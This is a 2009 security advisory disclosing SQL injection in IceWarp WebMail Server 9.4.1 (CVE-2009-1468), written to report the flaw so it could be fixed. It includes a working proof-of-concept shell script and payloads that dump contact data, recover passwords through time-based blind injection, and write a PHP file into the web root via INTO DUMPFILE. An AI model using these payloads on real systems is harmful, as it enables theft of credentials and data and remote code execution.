IceWarp WebMail SQL Injection

`Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component  
  
During a penetration test RedTeam Pentesting discovered multiple  
SQL-Injections in the IceWarp WebMail Server. Attackers that are in  
control of a user account for the web-based email and groupware  
components are able to execute arbitrary SQL SELECT statements and  
therefore read any data from the DBMS that are accessible by the Icewarp  
eMail Server.  
  
  
Details  
=======  
  
Product: IceWarp eMail Server / WebMail Server  
Affected Versions: 9.4.1  
Fixed Versions: 9.4.2  
Vulnerability Type: SQL Injection  
Security Risk: high  
Vendor URL: http://www.icewarp.com/  
Vendor Status: notified, fixed version released  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-003  
Advisory Status: published  
CVE: CVE-2009-1468  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1468  
  
  
Introduction  
============  
  
"Feature complete yet easy to use, WebMail Server Pro provides feature  
rich Web 2.0 web-based access to email, calendars, contacts, files and  
shared data from any computer with browser and internet connection,  
without the usual configuration hassle. Thanks to advanced technologies  
and application-like look and feel, Pro suggests it was born to become  
the ultimate replacement of Outlook and similar desktop mail clients."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
The IceWarp eMail Server's web-based groupware component provides  
functionality for users to store, for example, contact information,  
notes, a journal or files. A search form can be used to search for such  
stored items.  
  
When users search, for example, for certain files, using the provided  
search form, an HTTP POST request containing the search query in XML  
form is sent from the browser to the PHP script at  
https://example.com/webmail/server/webmail.php:  
  
----- HTTP POST request ------------------------------------------------  
<iq sid="73aaafec4a8db27af49c4c43bca4ac13"  
uid="1239870305230" type="get" format="json">  
<query xmlns="webmail:iq:items">  
<account uid="[email protected]">  
<folder uid="Files">  
<item>  
<values>  
<evntitle> </evntitle>  
<evnnote> </evnnote>  
[..]  
</values>  
<filter>  
<offset>0</offset>  
<limit>60</limit>  
<order_by>EVNTYPE asc</order_by>  
<sql>(EVNTITLE LIKE '%SQL INJECTION TEST%' OR   
EVNNOTE LIKE '%SQL INJECTION TEST%')  
</sql>  
</filter>  
</item>  
</folder>  
</account>  
</query>  
</iq>  
----- /HTTP POST request -----------------------------------------------  
  
It is evident that SQL expressions are used to find matching items and  
order the results. Using the information provided within the POST  
request, two SQL queries are constructed and executed on the database  
(relevant user-controlled parts marked with a leading ">"):  
  
----- Query 1 ----------------------------------------------------------  
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,  
evnstarttime, evntype, evncolor, evncomplete  
From Event Where  
(EVNGRP_ID = '3a7e072a3002') And  
(  
(  
> (EVNTITLE LIKE '%SQL INJECTION TEST%' OR  
> EVNNOTE LIKE '%SQL INJECTION TEST%')  
) AND  
evnclass <> 'O'  
) And  
(EvnFolder='Files')   
Order By  
> EVNLOCATION asc  
LIMIT 0,45  
----- /Query 1 ---------------------------------------------------------  
  
----- Query 2 ----------------------------------------------------------  
Select Count(EVN_ID) As Count_ From Event Where  
(EVNGRP_ID = '3a7e072a3002') And  
(  
> (EVNTITLE LIKE '%SQL INJECTION TEST%' OR  
> EVNNOTE LIKE '%SQL INJECTION TEST%')  
) And  
(EvnFolder='Files')  
----- /Query 2 ---------------------------------------------------------  
  
Data is only returned from the database to the web application when both  
queries are syntactically correct. Due to a different nesting level of  
parentheses around the SQL queries' user-manipulable parts, successful  
(non-blind) SQL injection requires the use of two elements within the  
original HTTP POST request.  
  
The following examples show the two queries that are executed when the  
<sql> element contains the string "0=1) /* " and the <order_by> element  
contains the string "*/)--". User input that is active within an SQL  
query is marked with a ">", user input that begins or ends a comment is  
marked with a "+", and application-provided query parts that are now  
commented out are marked with a "|":  
  
----- Query 1a ---------------------------------------------------------  
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,  
evnstarttime, evntype, evncolor, evncomplete  
From Event Where  
(EVNGRP_ID = '3a7e072a3002') And  
(  
(  
> 0=1)  
+ /* part of the <sql> element  
| ) AND  
| evnclass <> 'O'  
| ) And  
| (EvnFolder='Files') Order By  
+ part of the <order_by> element */  
> )--  
LIMIT 0,45  
----- /Query 1a --------------------------------------------------------  
  
----- Query 2a ---------------------------------------------------------  
Select Count(EVN_ID) As Count_ From Event Where  
(EVNGRP_ID = '3a7e072a3002') And  
(  
> 0=1)  
+ /* part of the <sql> element  
| ) And  
| (EvnFolder='Files')  
----- /Query 2a --------------------------------------------------------  
  
Note that this method requires a DBMS that allows unbalanced C-style  
(/**/) comments in its SQL syntax, such as SQLite3 or MySQL < 5.0.51.  
For other DBMS, blind SQL injection into the first SQL query is another  
option.  
  
  
Proof of Concept  
================  
  
The following shell script can be used to construct a valid search  
request as mentioned above. It expects a valid session ID and  
corresponding username as commandline arguments, followed by arguments  
that are inserted into the <order_by> and <sql> elements of the POST  
request.  
  
----- sql_inject.sh ----------------------------------------------------  
#!/bin/sh  
  
sid=$1  
uid=$2  
orderby=$3  
if [ -n "$4" ] ; then  
sql=$4  
else  
sql="1=0)/*"  
fi  
curl --silent -d '<iq sid="'$sid'" type="get" format="json">  
<query xmlns="webmail:iq:items">  
<account uid="'$uid'">  
<folder uid="Files">  
<item><values><evntitle></evntitle></values>  
<filter><offset></offset><limit></limit>  
<order_by>'"$orderby"'</order_by>  
<sql>'"$sql"'</sql>  
</filter>  
</item>  
</folder>  
</account>  
</query>  
</iq>' https://example.com/webmail/server/webmail.php | \  
perl -pe 's/{/\n/g' | grep "result::" | \  
sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'  
----- /sql_inject.sh ---------------------------------------------------  
  
For DBMS that support unbalanced C-Style comments, data can for example  
be retrieved from the database as follows:  
  
$ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 [email protected] \  
"*/) UNION SELECT random(),'NULL',  
('result::'||ItmFirstname||':'||ItmSurname) FROM ContactItem"  
  
Joe:Plumber  
John:Doe  
Agent:Smith  
Jane:Doe  
Joe:User  
  
  
For other DBMS, blind SQL injection is a possibility. The following  
example illustrates how a password for a certain user account is  
retrieved on an installation of the IceWarp eMail server that uses a  
recent version of MySQL for storing user account information:  
  
$ time ./sql_inject.sh \  
73aaafec4a8db27af49c4c43bca4ac13 [email protected] "" \  
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users  
WHERE U_Mailbox='user' AND U_Password LIKE 'a%'),SLEEP(5),1)-- "  
real 0m0.334s  
user 0m0.053s  
sys 0m0.007s  
[...]  
$ time ./sql_inject.sh \  
73aaafec4a8db27af49c4c43bca4ac13 [email protected] "" \  
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users  
WHERE U_Mailbox='user' AND U_Password LIKE 't%'),SLEEP(5),1)-- "  
real 0m5.441s  
user 0m0.037s  
sys 0m0.013s  
[...]  
$ time ./sql_inject.sh \  
73aaafec4a8db27af49c4c43bca4ac13 [email protected] "" \  
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users  
WHERE U_Mailbox='user' AND U_Password LIKE 'test'),SLEEP(5),1)-- "  
real 0m5.418s  
user 0m0.040s  
sys 0m0.010s  
  
Depending on the DBMS configuration, creation of arbitrary files and/or  
code execution might also be possible. The following example illustrates  
the creation of a PHP script within the web application's root directory  
using the SELECT .. INTO DUMPFILE functionality provided by MySQL:  
  
$ ./sql_inject.sh a3779402b23fa4acdcba6be907521acb [email protected] "" \  
"1=0)) UNION SELECT '','','<?php phpinfo();?>'   
INTO DUMPFILE 'c:/Program Files/Merak/html/webmail/phpinfo.php'-- "  
  
  
Workaround  
==========  
  
None.  
  
  
Fix  
===  
  
Upgrade to version 9.4.2.  
  
  
Security Risk  
=============  
  
The risk of this vulnerability is estimated as high. Depending on the  
IceWarp eMail Server configuration, and configuration of the DBMS used,  
attackers authenticated to the web application can leverage it to  
retrieve, for example, users' contacts, notes or journal entries, obtain  
user credentials, and/or execute arbitrary code.  
  
  
History  
=======  
  
2009-03-23 Vulnerabilities identified during a penetration test  
2009-04-01 Meeting with customer and vendor  
2009-04-28 CVE number assigned  
2009-05-05 Vendor publishes fixed version  
2009-05-05 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting is offering individual penetration tests, short  
pentests, performed by a team of specialised IT-security experts.  
Hereby, security weaknesses in company networks or products are  
uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 963-1300  
Dennewartstr. 25-27 Fax : +49 241 963-1304  
52068 Aachen http://www.redteam-pentesting.de/  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`